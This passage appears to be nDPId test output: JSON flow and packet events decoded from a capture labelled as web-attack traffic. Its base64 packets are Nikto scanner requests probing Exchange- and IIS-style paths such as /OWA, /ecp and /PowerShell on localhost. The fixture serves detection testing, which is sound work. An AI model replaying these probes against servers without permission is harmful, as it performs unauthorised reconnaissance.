+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 
Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7560000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
